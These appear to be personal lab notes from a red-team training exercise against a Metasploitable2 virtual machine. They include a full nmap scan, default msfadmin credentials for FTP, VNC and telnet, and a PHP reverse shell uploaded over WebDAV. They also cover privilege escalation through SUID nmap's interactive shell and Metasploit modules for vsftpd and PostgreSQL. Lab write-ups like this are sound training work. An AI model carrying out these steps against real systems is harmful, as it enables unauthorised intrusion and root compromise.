CRTAexternalWebServerExploitation

• did arp-scan -l -I eth1 to get the IP 192.168.50.3 and set it as an env variable to make my life easier
• nmap default scan results:

# Nmap 7.95 scan initiated Thu Sep  4 06:21:09 2025 as: /usr/lib/nmap/nmap -Pn -sCV -T4 -p- -oN Dscan.txt 192.168.50.3
Nmap scan report for 192.168.50.3
Host is up (0.0010s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.50.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      34951/udp   mountd
|   100005  1,2,3      57805/tcp   mountd
|   100021  1,3,4      46473/tcp   nlockmgr
|   100021  1,3,4      51370/udp   nlockmgr
|   100024  1          33595/udp   status
|_  100024  1          41681/tcp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: LongColumnFlag, SwitchToSSLAfterHandshake, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: h.IfEeN7f~giYa['N3S*
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2025-09-04T10:24:20+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34651/tcp open  java-rmi    GNU Classpath grmiregistry
41681/tcp open  status      1 (RPC #100024)
46473/tcp open  nlockmgr    1-4 (RPC #100021)
57805/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:88:37:58 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2025-09-04T06:23:28-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h20m07s, deviation: 2h18m33s, median: 7s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep  4 06:24:50 2025 -- 1 IP address (1 host up) scanned in 220.13 seconds

exploitation:

ftp1:

• theres a metasploit module for it. ran it and got root:
  

FTP2:

• can also login directly with the creds msfadmin:msfadmin

VNC:

• logged in with vncviewer with the password msfadmin. gives root access immediately
  

Telnet:

• do telnet IP and wait. will ask for a pass. do msfadmin

HTTP

• barebones page with alot to test. checked /dav (webDAV). a directory listing
• checked options by doing

nc 192.168.50.3 80
OPTIONS http://192.168.50.2/ HTTP/1.0
host:192.168.50.2
 

• the root page didnt return any extra options. /dav returned this:

╭─[~/projects/CRTA/external]─[root@DEMONDAYZ]─[0]─[4250]
╰─[:)] # nc 192.168.50.3 80
OPTIONS http://192.168.50.3/dav/ HTTP/1.0
host:192.168.50.3
 
HTTP/1.1 200 OK
Date: Sun, 07 Sep 2025 09:57:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
Content-Length: 0
Connection: close
Content-Type: httpd/unix-directory

• PUT is allowed
• used cadaver to upload a php shell

╭─[~/projects/CRTA/external]─[root@DEMONDAYZ]─[255]─[4253]
╰─[:(] # cadaver http://192.168.50.3/dav 
dav:/dav/> ls
Listing collection `/dav/': collection is empty.
dav:/dav/> put /usr/share/webshells/php/php-reverse-shell.php
Uploading /usr/share/webshells/php/php-reverse-shell.php to `/dav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5494 bytes succeeded.
dav:/dav/> 

• ran it and got a shell as www-data. used shellStabilizationChecklist
• ran linpeas. nmap has SUID set
• did this to get partial root:

nmap --interactive
!sh

• used partialRootToFullRootChecklist to get full root :D
  

postgreSQL

• ran msf exploit(linux/postgres/postgres_payload) to get a meterpreter shell aspostgres
• did the same shit with nmap to get privs